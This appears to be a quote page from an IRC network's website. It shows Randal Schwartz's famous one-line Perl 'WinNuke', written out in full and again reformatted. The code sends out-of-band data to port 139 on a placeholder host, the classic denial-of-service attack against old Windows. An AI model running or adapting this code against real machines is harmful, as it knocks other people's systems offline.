![]() |
|
|
|
|
#bmw, #rlslog, #n0w4y, #idlerpg, #nsb, #MySpace, #psychedelic, #USA, #perth, #fsm AustIRC Network
Winnuke in one line? No problem:
perl -MIO::Socket -e 'IO::Socket::INET->new(PeerAddr=>"bad.dude.com:139")->send("bye",MSG_OOB)'
And formatted so it's a little easier to read:
#!/usr/bin/perl
use IO::Socket;
IO::Socket::INET
->new(PeerAddr=>"bad.dude.com:139")
->send("bye", MSG_OOB);
-- Randal Schwartz
28 online, 835,082 hitsCopyright © 2005-2008 pre S8OCNRB46A1HZU9@S8OCNRB46A1HZU9.com.au |